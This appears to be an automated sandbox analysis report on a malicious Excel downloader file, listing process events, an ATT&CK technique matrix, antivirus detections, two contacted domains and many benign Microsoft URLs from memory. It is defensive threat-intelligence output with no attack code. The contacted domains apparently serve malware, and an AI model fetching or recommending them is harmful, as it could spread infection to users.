Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000001.00000002.261356890.0000000004E00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000002.261356890.0000000004E00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000001.00000002.261356890.0000000004E00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000001.00000002.261356890.0000000004E00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
diagram-419065597.xls15%ReversingLabsDocument-Office.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
stateoftheartacademy.com.br0%VirustotalBrowse
dsafarm.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
stateoftheartacademy.com.br
108.167.180.130
truefalseunknown
dsafarm.com
208.91.198.131
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
    high
    https://login.microsoftonline.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
      high
      https://shell.suite.office.com:1443DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
          high
          https://autodiscover-s.outlook.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
              high
              https://cdn.entity.DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                    high
                    https://powerlift.acompli.netDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                      high
                      https://cortana.aiDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                high
                                https://api.aadrm.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                      high
                                      https://cr.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                            high
                                            https://graph.ppe.windows.netDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                            high
                                                            https://graph.windows.netDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                high
                                                                                                https://api.office.netDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.DF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiDF844609-1DF5-41CA-99D6-1693334E4107.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
